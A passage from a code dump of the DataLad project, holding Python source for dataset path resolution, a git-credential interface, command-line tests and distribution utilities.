kwargs\n # TODO: issue a DX oriented warning that we advise to separate out kwargs,\n # dataset included, with * from positional args?\n ds_index = f_args.index(dataset_argname)\n for i in range(0, len(args)):\n if i < ds_index:\n kwargs[f_args[i]] = args[i]\n elif i >= ds_index:\n kwargs[f_args[i+1]] = args[i]\n args = []\n return f(*args, **kwargs)\n\n setattr(Dataset, name, apply_func)\n # set the ad-hoc attribute so that @build_doc could also bind built doc\n # to the dataset method\n if getattr(f, '_dataset_method', None):\n raise RuntimeError(f\"_dataset_method of {f} is already set to {f._dataset_method}\")\n setattr(f, '_dataset_method', apply_func)\n return f\n\n\n# Note: Cannot be defined within constraints.py, since then dataset.py needs to\n# be imported from constraints.py, which needs to be imported from dataset.py\n# for another constraint\nclass EnsureDataset(Constraint):\n \"\"\"Despite its name, this constraint does not actually ensure that the\n argument is a valid dataset, because for procedural reasons this would\n typically duplicate subsequent checks and processing. However, it can\n be used to achieve uniform documentation of `dataset` arguments.\"\"\"\n\n def __call__(self, value):\n if isinstance(value, Dataset):\n return value\n elif isinstance(value, (str, PurePath)):\n # we cannot convert to a Dataset class right here\n # - duplicates require_dataset() later on\n # - we need to be able to distinguish between a bound\n # dataset method call and a standalone call for\n # relative path argument disambiguation\n #return Dataset(path=value)\n return value\n else:\n raise ValueError(\"Can't create Dataset from %s.\" % type(value))\n\n def short_description(self):\n return \"Dataset\"\n\n def long_description(self):\n return \"\"\"Value must be a Dataset or a valid identifier of a Dataset\n (e.g. a path)\"\"\"\n\n\ndef require_dataset(dataset, check_installed=True, purpose=None):\n \"\"\"Helper function to resolve a dataset.\n\n This function tries to resolve a dataset given an input argument,\n or based on the process' working directory, if `None` is given.\n\n Parameters\n ----------\n dataset : None or path or Dataset\n Some value identifying a dataset or `None`. In the latter case\n a dataset will be searched based on the process working directory.\n check_installed : bool, optional\n If True, an optional check whether the resolved dataset is\n properly installed will be performed.\n purpose : str, optional\n This string will be inserted in error messages to make them more\n informative. The pattern is \"... dataset for <STRING>\".\n\n Returns\n -------\n Dataset\n If a dataset could be determined.\n\n Raises\n ------\n NoDatasetFound\n If not dataset could be determined.\n \"\"\"\n if dataset is not None and not isinstance(dataset, Dataset):\n dataset = Dataset(dataset)\n\n if dataset is None: # possible scenario of cmdline calls\n dspath = get_dataset_root(getpwd())\n if not dspath:\n raise NoDatasetFound(\n \"No dataset found at '{}'{}. Specify a dataset to work with \"\n \"by providing its path via the `dataset` option, \"\n \"or change the current working directory to be in a \"\n \"dataset.\".format(\n getpwd(),\n \" for the purpose {!r}\".format(purpose) if purpose else ''\n )\n )\n dataset = Dataset(dspath)\n\n assert(dataset is not None)\n lgr.debug(u\"Resolved dataset%s: %s\",\n u' to {}'.format(purpose) if purpose else '',\n dataset.path)\n\n if check_installed and not dataset.is_installed():\n raise NoDatasetFound(\n f\"No installed dataset found at {dataset.path}\")\n\n return dataset\n\n\n# New helpers, courtesy of datalad-revolution.\n\n\n# note: not thread safe if threads chdir - uses getpwd\ndef resolve_path(path, ds=None, ds_resolved=None):\n \"\"\"Resolve a path specification (against a Dataset location)\n\n Any path is returned as an absolute path. If, and only if, a dataset\n object instance is given as `ds`, relative paths are interpreted as\n relative to the given dataset. In all other cases, relative paths are\n treated as relative to the current working directory.\n\n Note however, that this function is not able to resolve arbitrarily\n obfuscated path specifications. All operations are purely lexical, and no\n actual path resolution against the filesystem content is performed.\n Consequently, common relative path arguments like '../something' (relative\n to PWD) can be handled properly, but things like 'down/../under' cannot, as\n resolving this path properly depends on the actual target of any\n (potential) symlink leading up to '..'.\n\n Parameters\n ----------\n path : str or PathLike or list\n Platform-specific path specific path specification. Multiple path\n specifications can be given as a list\n ds : Dataset or PathLike or None\n Dataset instance to resolve relative paths against.\n ds_resolved : Dataset or None\n A dataset instance that was created from `ds` outside can be provided\n to avoid multiple instantiation on repeated calls.\n\n Returns\n -------\n `pathlib.Path` object or list(Path)\n When a list was given as input a list is returned, a Path instance\n otherwise.\n \"\"\"\n got_ds_instance = isinstance(ds, Dataset)\n if ds is not None and not got_ds_instance:\n ds = ds_resolved or require_dataset(\n ds, check_installed=False, purpose='path resolution')\n out = []\n pwd_parts = None # get it upon first use but only once\n for p in ensure_list(path):\n if ds is None or not got_ds_instance:\n # no dataset at all or no instance provided -> CWD is always the reference\n # nothing needs to be done here. Path-conversion and absolutification\n # are done next\n pass\n # we have a given datasets instance\n elif not Path(p).is_absolute():\n # we have a dataset and no abspath nor an explicit relative path ->\n # resolve it against the dataset\n p = ds.pathobj / p\n\n p = ut.Path(p)\n\n # make sure we return an absolute path, but without actually\n # resolving anything\n if not p.is_absolute():\n # in general it is almost impossible to use resolve() when\n # we can have symlinks in the root path of a dataset\n # (that we don't want to resolve here), symlinks to annex'ed\n # files (that we never want to resolve), and other within-repo\n # symlinks that we (sometimes) want to resolve (i.e. symlinked\n # paths for addressing content vs adding content)\n # CONCEPT: do the minimal thing to catch most real-world inputs\n # ASSUMPTION: the only sane relative path input that needs\n # handling and can be handled are upward references like\n # '../../some/that', whereas stuff like 'down/../someotherdown'\n # are intellectual exercises\n # ALGORITHM: match any number of leading '..' path components\n # and shorten the PWD by that number\n # NOT using ut.Path.cwd(), because it has symlinks resolved!!\n if not pwd_parts:\n pwd_parts = ut.Path(getpwd()).parts\n path_parts = p.parts\n leading_parents = 0\n for pp in p.parts:\n if pp == op.pardir:\n leading_parents += 1\n path_parts = path_parts[1:]\n elif pp == op.curdir:\n # we want to discard that, but without stripping\n # a corresponding parent\n path_parts = path_parts[1:]\n else:\n break\n p = ut.Path(\n op.join(\n *(pwd_parts[:-leading_parents if leading_parents else None]\n + path_parts)))\n # note that we will not \"normpath()\" the result, check the\n # pathlib docs for why this is the only sane choice in the\n # face of the possibility of symlinks in the path\n out.append(p)\n return out[0] if isinstance(path, (str, PurePath)) else out\n\n# TODO keep this around for a while so that extensions can be updated\nrev_resolve_path = resolve_path\n\n\ndef path_under_rev_dataset(ds, path):\n ds_path = ds.pathobj\n try:\n rpath = str(ut.Path(path).relative_to(ds_path))\n if not rpath.startswith(op.pardir):\n # path is already underneath the dataset\n return path\n except Exception:\n # whatever went wrong, we gotta play save\n pass\n\n root = get_dataset_root(str(path))\n while root is not None and not ds_path.samefile(root):\n # path and therefore root could be relative paths,\n # hence in the next round we cannot use dirname()\n # to jump in the the next directory up, but we have\n # to use ./.. and get_dataset_root() will handle\n # the rest just fine\n root = get_dataset_root(op.join(root, op.pardir))\n if root is None:\n return None\n return ds_path / op.relpath(str(path), root)\n\n\nlgr.log(5, \"Done importing dataset\")\n" }, { "alpha_fraction": 0.5573372840881348, "alphanum_fraction": 0.5603207349777222, "avg_line_length": 33.36538314819336, "blob_id": "6e861d3d178554e87c63a2671c4fe43bc104baa7", "content_id": "6adba62cba51cf4340736828034ee9dcf2068038", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5371, "license_type": "permissive", "max_line_length": 87, "num_lines": 156, "path": "/datalad/local/gitcredential.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\n\"\"\"\n\nfrom io import StringIO\n\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutErrCapture,\n)\n\nfrom logging import getLogger\nlgr = getLogger('datalad.local.gitcredentials')\n\n\ndef _credspec2dict(spec):\n \"\"\"Parser for git-credential input/output format\n\n See `man 1 git-credential` (INPUT/OUTPUT FORMAT)\n\n Parameters\n ----------\n spec : file-like or IO stream\n\n Returns\n -------\n dict\n \"\"\"\n attrs = {}\n for line in spec:\n if not line:\n # empty line ends specification\n break\n # protocol violations?\n assert('=' in line)\n assert(line[-1] == '\\n')\n k, v = line[:-1].split('=', maxsplit=1)\n # w/o conversion to str this might be a _io.TextWrapper crashing further\n # down the road (for example when passed to re.match):\n attrs[k] = str(v)\n return attrs\n\n\nclass GitCredentialInterface(object):\n \"\"\"Frontend to `git credential`\n \"\"\"\n\n def __init__(self, protocol=None, host=None, path=None, username=None,\n password=None, url=None, repo=None):\n \"\"\"\n protocol: str, optional\n The protocol over which the credential will be used (e.g., https).\n host: str, optional\n The remote hostname for a network credential. This includes the port\n number if one was specified (e.g., \"example.com:8088\").\n path: str, optional\n The path with which the credential will be used. E.g., for accessing\n a remote https repository, this will be the repository’s path on the\n server.\n username: str, optional\n The credential’s username, if we already have one (e.g., from a URL,\n the configuration, the user, or from a previously run helper).\n password: str, optional\n The credential’s password, if we are asking it to be stored.\n url: str, optional\n When this special attribute is read by git credential as 'url', the\n value is parsed as a URL and treated as if its constituent parts were\n read (e.g., url=https://example.com would behave as if\n protocol=https and host=example.com had been provided).\n This can help callers avoid parsing URLs themselves.\n\n Note that specifying a protocol is mandatory and if the URL doesn’t\n specify a hostname (e.g., \"cert:///path/to/file\") the credential will\n contain a hostname attribute whose value is an empty string.\n\n Components which are missing from the URL (e.g., there is no username\n in the example above) will be left unset.\n repo : GitRepo, optional\n Specify to process credentials in the context of a particular\n repository (e.g. to consider a repository-local credential helper\n configuration).\n \"\"\"\n self._runner = None\n self._repo = repo\n self._credential_props = {}\n for name, var in (('url', url),\n ('protocol', protocol),\n ('host', host),\n ('path', path),\n ('username', username),\n ('password', password)):\n if var is None:\n continue\n self._credential_props[name] = var\n\n def _get_runner(self):\n runner = self._runner or GitWitlessRunner(\n cwd=self._repo.path if self._repo else None)\n self._runner = runner\n return runner\n\n def _format_props(self):\n props = ''\n for p in self._credential_props:\n val = self._credential_props.get(p)\n if self._credential_props.get(p) is None:\n continue\n props += '{}={}\\n'.format(p, val)\n\n props = props.encode('utf-8')\n if not props:\n props = b'\\n'\n return props\n\n def __getitem__(self, key):\n return self._credential_props.__getitem__(key)\n\n def __contains__(self, key):\n return self._credential_props.__contains__(key)\n\n def __repr__(self):\n return repr(self._credential_props)\n\n def fill(self):\n # TODO we could prevent prompting by setting GIT_ASKPASS=true\n # unclear how to achieve the same on windows\n # would be better to use a special return value for no-prompt\n # with GIT_ASKPASS=true would just be an empty string\n out = self._get_runner().run(\n ['git', 'credential', 'fill'],\n protocol=StdOutErrCapture,\n stdin=self._format_props()\n )\n attrs = _credspec2dict(StringIO(out['stdout']))\n self._credential_props = attrs\n return self\n\n def approve(self):\n self._get_runner().run(\n ['git', 'credential', 'approve'],\n stdin=self._format_props()\n )\n\n def reject(self):\n self._get_runner().run(\n ['git', 'credential', 'reject'],\n stdin=self._format_props()\n )\n\n\n" }, { "alpha_fraction": 0.6000764966011047, "alphanum_fraction": 0.6036472320556641, "avg_line_length": 35.728336334228516, "blob_id": "e7c240a879fbafb8dca27bd301735175c6d7c7e8", "content_id": "18254166e3f7d5c9eb4586b517a680dd49c0e092", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15683, "license_type": "permissive", "max_line_length": 105, "num_lines": 427, "path": "/datalad/cli/tests/test_main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test functioning of the datalad main cmdline utility \"\"\"\n\nimport os\nimport re\nfrom io import StringIO\nfrom unittest.mock import patch\n\nimport pytest\n\nimport datalad\nfrom datalad import __version__\nfrom datalad.api import (\n Dataset,\n create,\n)\nfrom datalad.cmd import StdOutErrCapture\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.interface.base import get_interface_groups\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_re_in,\n eq_,\n in_,\n ok_,\n ok_startswith,\n on_windows,\n skip_if_no_module,\n slow,\n with_tempfile,\n)\nfrom datalad.ui.utils import (\n get_console_width,\n get_terminal_size,\n)\nfrom datalad.utils import chpwd\n\nfrom ..helpers import get_commands_from_groups\nfrom ..main import main\n\n\ndef run_main(args, exit_code=0, expect_stderr=False):\n \"\"\"Run main() of the datalad, do basic checks and provide outputs\n\n Parameters\n ----------\n args : list\n List of string cmdline arguments to pass\n exit_code : int\n Expected exit code. Would raise AssertionError if differs\n expect_stderr : bool or string\n Whether to expect stderr output. If string -- match\n\n Returns\n -------\n stdout, stderr strings\n Output produced\n \"\"\"\n was_mode = datalad.__api\n try:\n # we need to catch \"stdout\" from multiple places:\n # sys.stdout but also from the UI, which insists on holding\n # a dedicated handle\n fakeout = StringIO()\n fakeerr = StringIO()\n with patch('sys.stderr', new=fakeerr) as cmerr, \\\n patch('sys.stdout', new=fakeout) as cmout, \\\n patch.object(datalad.ui.ui._ui, 'out', new=fakeout):\n with assert_raises(SystemExit) as cm:\n main([\"datalad\"] + list(args))\n eq_('cmdline', datalad.get_apimode())\n assert_equal(cm.value.code, exit_code)\n stdout = cmout.getvalue()\n stderr = cmerr.getvalue()\n if expect_stderr is False:\n assert_equal(stderr, \"\")\n elif expect_stderr is True:\n # do nothing -- just return\n pass\n else:\n # must be a string\n assert_equal(stderr, expect_stderr)\n finally:\n # restore what we had\n datalad.__api = was_mode\n\n return stdout, stderr\n\n\ndef get_all_commands() -> list:\n return list(get_commands_from_groups(get_interface_groups()))\n\n\ndef assert_all_commands_present(out):\n \"\"\"Helper to reuse to assert that all known commands are present in output\n \"\"\"\n for cmd in get_all_commands():\n assert_re_in(fr\"\\b{cmd}\\b\", out, match=False)\n\n\n# TODO: switch to stdout for --version output\ndef test_version():\n # we just get a version if not asking for a version of some command\n stdout, stderr = run_main(['--version'], expect_stderr=True)\n eq_(stdout.rstrip(), \"datalad %s\" % datalad.__version__)\n\n stdout, stderr = run_main(['clone', '--version'], expect_stderr=True)\n ok_startswith(stdout, 'datalad %s\\n' % datalad.__version__)\n # since https://github.com/datalad/datalad/pull/2733 no license in --version\n assert_not_in(\"Copyright\", stdout)\n assert_not_in(\"Permission is hereby granted\", stdout)\n\n try:\n import datalad_container\n except ImportError:\n pass # not installed, cannot test with extension\n else:\n stdout, stderr = run_main(['containers-list', '--version'], expect_stderr=True)\n eq_(stdout, 'datalad_container %s\\n' % datalad_container.__version__)\n\n\ndef test_help_np():\n stdout, stderr = run_main(['--help-np'])\n\n # Let's extract section titles:\n # enough of bin/datalad and .tox/py27/bin/datalad -- guarantee consistency! ;)\n ok_startswith(stdout, 'Usage: datalad')\n # Sections start/end with * if ran under DATALAD_HELP2MAN mode\n sections = [l[1:-1] for l in filter(re.compile(r'^\\*.*\\*$').match, stdout.split('\\n'))]\n for s in {'Essential',\n 'Miscellaneous',\n 'General information',\n 'Global options',\n 'Plumbing',\n }:\n assert_in(s, sections)\n # should be present only one time!\n eq_(stdout.count(f'*{s}*'), 1)\n\n # check that we have global options actually listed after \"Global options\"\n # ATM -c is the first such option\n assert re.search(r\"Global options\\W*-c \", stdout, flags=re.MULTILINE)\n # and -c should be listed only once - i.e. that we do not duplicate sections\n # and our USAGE summary has only [global-opts]\n assert re.match(r\"Usage: .*datalad.* \\[global-opts\\] command \\[command-opts\\]\", stdout)\n assert stdout.count(' -c ') == 1\n\n assert_all_commands_present(stdout)\n\n if not get_terminal_size()[0] or 0:\n raise SkipTest(\n \"Could not determine terminal size, skipping the rest of the test\")\n\n # none of the lines must be longer than 80 chars\n # TODO: decide on create-sibling and possibly\n # rewrite-urls\n accepted_width = get_console_width()\n\n long_lines = [\"%d %s\" % (len(l), l) for l in stdout.split('\\n')\n if len(l) > accepted_width and\n '{' not in l # on nd70 summary line is unsplit\n ]\n if long_lines:\n raise AssertionError(\n \"Following lines in --help output were longer than %s chars:\\n%s\"\n % (accepted_width, '\\n'.join(long_lines))\n )\n\n\ndef test_dashh():\n stdout, stderr = run_main(['-h'])\n # Note: for -h we do not do ad-hoc tune up of Usage: to guarantee having\n # datalad instead of python -m nose etc, so we can only verify that we have\n # options listed\n assert_re_in(r'^Usage: .*\\[', stdout.splitlines()[0])\n assert_all_commands_present(stdout)\n assert_re_in('Use .--help. to get more comprehensive information', stdout.splitlines())\n\n\ndef test_dashh_clone():\n # test -h on a sample command\n stdout, stderr = run_main(['clone', '-h'])\n assert_re_in(r'^Usage: .* clone \\[', stdout.splitlines()[0])\n assert_re_in('Use .--help. to get more comprehensive information', stdout.splitlines())\n\n\ndef test_usage_on_insufficient_args():\n stdout, stderr = run_main(['install'], exit_code=2, expect_stderr=True)\n ok_startswith(stderr, 'usage:')\n\n\ndef test_subcmd_usage_on_unknown_args():\n stdout, stderr = run_main(['get', '--murks'], exit_code=1, expect_stderr=True)\n in_('get', stdout)\n\n\ndef test_combined_short_option():\n stdout, stderr = run_main(['-fjson'], exit_code=2, expect_stderr=True)\n assert_not_in(\"unrecognized argument\", stderr)\n assert_in(\"too few arguments\", stderr)\n\n\n# https://github.com/datalad/datalad/issues/6814\n@with_tempfile(mkdir=True)\ndef test_conflicting_short_option(tempdir=None):\n # datalad -f|--format requires a value. regression made parser ignore command\n # and its options\n with chpwd(tempdir): # can't just use -C tempdir since we do \"in process\" run_main\n run_main(['create', '-f'])\n\n\n# apparently a bit different if following a good one so let's do both\nerr_invalid = \"error: (invalid|too few arguments|unrecognized argument)\"\nerr_insufficient = err_invalid # \"specify\"\n\n\[email protected](\n \"opts,err_str\",\n [\n (('--buga',), err_invalid),\n (('--dbg', '--buga'), err_invalid),\n (('--dbg',), err_insufficient),\n (tuple(), err_insufficient),\n ]\n)\ndef test_incorrect_option(opts, err_str):\n # The first line used to be:\n # stdout, stderr = run_main((sys.argv[0],) + opts, expect_stderr=True, exit_code=2)\n # But: what do we expect to be in sys.argv[0] here?\n # It depends on how we invoke the test.\n # - nosetests -s -v datalad/cmdline/tests/test_main.py would result in:\n # sys.argv[0}=='nosetests'\n # - python -m nose -s -v datalad/cmdline/tests/test_main.py would result in:\n # sys.argv[0}=='python -m nose'\n # - python -c \"import nose; nose.main()\" -s -v datalad/cmdline/tests/test_main.py would result in:\n # sys.argv[0]=='-c'\n # This led to failure in case sys.argv[0] contained an option, that was\n # defined to be a datalad option too, therefore was a 'known_arg' and was\n # checked to meet its constraints.\n # But sys.argv[0] actually isn't used by main at all. It simply doesn't\n # matter what's in there. The only thing important to pass here is `opts`.\n stdout, stderr = run_main(opts, expect_stderr=True, exit_code=2)\n out = stdout + stderr\n assert_in(\"usage: \", out)\n assert_re_in(err_str, out, match=False)\n\n\[email protected](\n \"script\",\n [\n 'datalad',\n 'git-annex-remote-datalad-archives',\n 'git-annex-remote-datalad',\n ]\n)\ndef test_script_shims(script):\n runner = Runner()\n if not on_windows:\n\n from shutil import which\n which(script)\n\n # and let's check that it is our script\n out = runner.run([script, '--version'], protocol=StdOutErrCapture)\n version = out['stdout'].rstrip()\n mod, version = version.split(' ', 1)\n assert_equal(mod, 'datalad')\n # we can get git and non git .dev version... so for now\n # relax\n get_numeric_portion = lambda v: [x for x in re.split('[+.]', v) if x.isdigit()]\n # extract numeric portion\n assert get_numeric_portion(version), f\"Got no numeric portion from {version}\"\n assert_equal(get_numeric_portion(__version__),\n get_numeric_portion(version))\n\n\n@with_tempfile(mkdir=True)\ndef test_cfg_override(path=None):\n with chpwd(path):\n # use 'wtf' to dump the config\n # should be rewritten to use `configuration`\n cmd = ['datalad', 'wtf', '-S', 'configuration', '-s', 'some']\n # control\n out = Runner().run(cmd, protocol=StdOutErrCapture)['stdout']\n assert_not_in('datalad.dummy: this', out)\n # ensure that this is not a dataset's cfg manager\n assert_not_in('datalad.dataset.id', out)\n # env var\n out = Runner(env=dict(os.environ, DATALAD_DUMMY='this')).run(\n cmd, protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n # cmdline arg\n out = Runner().run([cmd[0], '-c', 'datalad.dummy=this'] + cmd[1:],\n protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n\n # now create a dataset in the path. the wtf plugin will switch to\n # using the dataset's config manager, which must inherit the overrides\n create(dataset=path, annex=False)\n # control\n out = Runner().run(cmd, protocol=StdOutErrCapture)['stdout']\n assert_not_in('datalad.dummy: this', out)\n # ensure that this is a dataset's cfg manager\n assert_in('datalad.dataset.id', out)\n # env var\n out = Runner(env=dict(os.environ, DATALAD_DUMMY='this')).run(\n cmd, protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n # cmdline arg\n out = Runner().run([cmd[0], '-c', 'datalad.dummy=this'] + cmd[1:],\n protocol=StdOutErrCapture)['stdout']\n assert_in('datalad.dummy: this', out)\n\n # set a config\n run_main([\n 'configuration', '--scope', 'local', 'set', 'mike.item=some'])\n # verify it is successfully set\n assert 'some' == run_main([\n 'configuration', 'get', 'mike.item'])[0].strip()\n # verify that an override can unset the config\n # we cannot use run_main(), because the \"singleton\" instance of the\n # dataset we are in is still around in this session, and with it\n # also its config managers that we will not be able to post-hoc\n # overwrite with this method. Instead, we'll execute in a subprocess.\n assert '' == Runner().run([\n 'datalad', '-c', ':mike.item',\n 'configuration', 'get', 'mike.item'],\n protocol=StdOutErrCapture)['stdout'].strip()\n # verify the effect is not permanent\n assert 'some' == Runner().run([\n 'datalad',\n 'configuration', 'get', 'mike.item'],\n protocol=StdOutErrCapture)['stdout'].strip()\n\n\ndef test_incorrect_cfg_override():\n run_main(['-c', 'some', 'wtf'], exit_code=3)\n run_main(['-c', 'some=', 'wtf'], exit_code=3)\n run_main(['-c', 'some.var', 'wtf'], exit_code=3)\n run_main(['-c', 'some.var=', 'wtf'], exit_code=3)\n\n\n@with_tempfile\ndef test_librarymode(path=None):\n Dataset(path).create()\n was_mode = datalad.__runtime_mode\n try:\n # clean --dry-run is just a no-op command that is cheap\n # to execute. It has no particular role here, other than\n # to make the code pass the location where library mode\n # should be turned on via the cmdline API\n run_main(['-c', 'datalad.runtime.librarymode=yes', 'clean',\n '-d', path, '--dry-run'])\n ok_(datalad.in_librarymode())\n finally:\n # restore pre-test behavior\n datalad.__runtime_mode = was_mode\n datalad.cfg.overrides.pop('datalad.runtime.librarymode')\n\n\n@with_tempfile\ndef test_completion(out_fn=None):\n skip_if_no_module('argcomplete')\n\n from datalad.cmd import WitlessRunner\n runner = WitlessRunner()\n\n def get_completions(s: str, expected) -> list:\n \"\"\"Run 'datalad' external command and collect completions\n\n Parameters\n ----------\n s: str\n what to append to 'datalad ' invocation\n expected: iterable of str\n What entries to expect - would raise AssertionError if any is\n not present in output\n exit_code: int, optional\n If incomplete/malformed we seems to get 2, most frequently used\n so default\n\n Returns\n -------\n list of str\n Entries output\n \"\"\"\n if os.path.exists(out_fn): # reuse but ensure it is gone\n os.unlink(out_fn)\n comp_line = f'datalad {s}'\n runner.run(\n comp_line.split(' '),\n env=dict(os.environ,\n _ARGCOMPLETE='1',\n _ARGCOMPLETE_STDOUT_FILENAME=out_fn,\n COMP_LINE=comp_line,\n # without -1 seems to get \"finished completion\", someone can investigate more\n COMP_POINT=str(len(comp_line)-1), # always at the end ATM\n ))\n with open(out_fn, 'rb') as f:\n entries = f.read().split(b'\\x0b')\n entries = [e.decode() for e in entries]\n diff = set(expected).difference(entries)\n if diff:\n raise AssertionError(\n f\"Entries {sorted(diff)} were expected but not found in the completion output: {entries}\"\n )\n return entries # for extra analyzes if so desired\n\n all_commands = get_all_commands()\n get_completions('i', {'install'})\n get_completions(' ', ['--dbg', '-c'] + all_commands)\n # if command already matches -- we get only that hit ATM, not others which begin with it\n get_completions('create', ['create '])\n get_completions('create -', ['--dataset'])\n # but for incomplete one we do get all create* commands\n get_completions('creat', [c for c in all_commands if c.startswith('create')])\n" }, { "alpha_fraction": 0.5693232417106628, "alphanum_fraction": 0.5708745121955872, "avg_line_length": 30.066265106201172, "blob_id": "21970d73f6360a5b8bf598a885f89029545cb6be", "content_id": "3ef3ca4be07d45047f5f232e57ad4f83572eb244", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5157, "license_type": "permissive", "max_line_length": 87, "num_lines": 166, "path": "/datalad/distribution/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Distribution utility functions\n\n\"\"\"\n\nimport logging\n\nfrom os.path import (\n isabs,\n join as opj,\n normpath,\n)\nimport posixpath\nfrom datalad.log import log_progress\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.network import (\n PathRI,\n RI,\n URL,\n)\n\n\nlgr = logging.getLogger('datalad.distribution.utils')\n\n\ndef _get_flexible_source_candidates(src, base_url=None, alternate_suffix=True):\n \"\"\"Get candidates to try cloning from.\n\n Primarily to mitigate the problem that git doesn't append /.git\n while cloning from non-bare repos over dummy protocol (http*). Also to\n simplify creation of urls whenever base url and relative path within it\n provided\n\n Parameters\n ----------\n src : string or RI\n Full or relative (then considered within base_url if provided) path\n base_url : string or RI, optional\n alternate_suffix : bool\n Whether to generate URL candidates with and without '/.git' suffixes.\n\n Returns\n -------\n candidates : list of str\n List of RIs (path, url, ssh targets) to try to install from\n \"\"\"\n candidates = []\n\n ri = RI(src)\n if isinstance(ri, PathRI) and not isabs(ri.path) and base_url:\n ri = RI(base_url)\n if ri.path.endswith('/.git'):\n base_path = ri.path[:-5]\n base_suffix = '.git'\n else:\n base_path = ri.path\n base_suffix = ''\n if isinstance(ri, PathRI):\n # this is a path, so stay native\n ri.path = normpath(opj(base_path, src, base_suffix))\n else:\n # we are handling a URL, use POSIX path conventions\n ri.path = posixpath.normpath(\n posixpath.join(base_path, src, base_suffix))\n\n src = str(ri)\n\n candidates.append(src)\n if alternate_suffix and isinstance(ri, URL):\n if ri.scheme in {'http', 'https'}:\n # additionally try to consider .git:\n if not src.rstrip('/').endswith('/.git'):\n candidates.append(\n '{0}/.git'.format(src.rstrip('/')))\n\n return candidates\n\n\n\ndef _yield_ds_w_matching_siblings(\n ds, names, recursive=False, recursion_limit=None):\n \"\"\"(Recursively) inspect a dataset for siblings with particular name(s)\n\n Parameters\n ----------\n ds: Dataset\n The dataset to be inspected.\n names: iterable\n Sibling names (str) to test for.\n recursive: bool, optional\n Whether to recurse into subdatasets.\n recursion_limit: int, optional\n Recursion depth limit.\n\n Yields\n ------\n str, str\n Path to the dataset with a matching sibling, and name of the matching\n sibling in that dataset.\n \"\"\"\n\n def _discover_all_remotes(ds, refds, **kwargs):\n \"\"\"Helper to be run on all relevant datasets via foreach\n \"\"\"\n # Note, that `siblings` doesn't tell us about not enabled special\n # remotes. There could still be conflicting names we need to know\n # about in order to properly deal with the `existing` switch.\n\n repo = ds.repo\n # list of known git remotes\n if isinstance(repo, AnnexRepo):\n remotes = repo.get_remotes(exclude_special_remotes=True)\n remotes.extend([v['name']\n for k, v in repo.get_special_remotes().items()]\n )\n else:\n remotes = repo.get_remotes()\n return remotes\n\n if not recursive:\n for name in _discover_all_remotes(ds, ds):\n if name in names:\n yield ds.path, name\n return\n\n # in recursive mode this check could take a substantial amount of\n # time: employ a progress bar (or rather a counter, because we don't\n # know the total in advance\n pbar_id = 'check-siblings-{}'.format(id(ds))\n log_progress(\n lgr.info, pbar_id,\n 'Start checking pre-existing sibling configuration %s', ds,\n label='Query siblings',\n unit=' Siblings',\n )\n\n for res in ds.foreach_dataset(\n _discover_all_remotes,\n recursive=recursive,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled',\n ):\n # unwind result generator\n if 'result' in res:\n for name in res['result']:\n log_progress(\n lgr.info, pbar_id,\n 'Discovered sibling %s in dataset at %s',\n name, res['path'],\n update=1,\n increment=True)\n if name in names:\n yield res['path'], name\n\n log_progress(\n lgr.info, pbar_id,\n 'Finished checking pre-existing sibling configuration %s', ds,\n )\n" }, { "alpha_fraction": 0.4704112410545349, "alphanum_fraction": 0.5105316042900085, "avg_line_length": 30.15625, "blob_id": "51ab3d0c993097ec569d1ebf8ae2ddb1fcf1860b", "content_id": "4b10cee6896373d00d96385f62e8998cf0e11565", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "permissive", "max_line_length": 87, "num_lines": 32, "path": "/datalad/tests/test_misc.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom packaging.version import Version\n\nimport datalad\nfrom datalad.support.network import (\n get_url_response_stamp,\n is_url_quoted,\n)\n\nfrom .utils_pytest import *\n\n\ndef 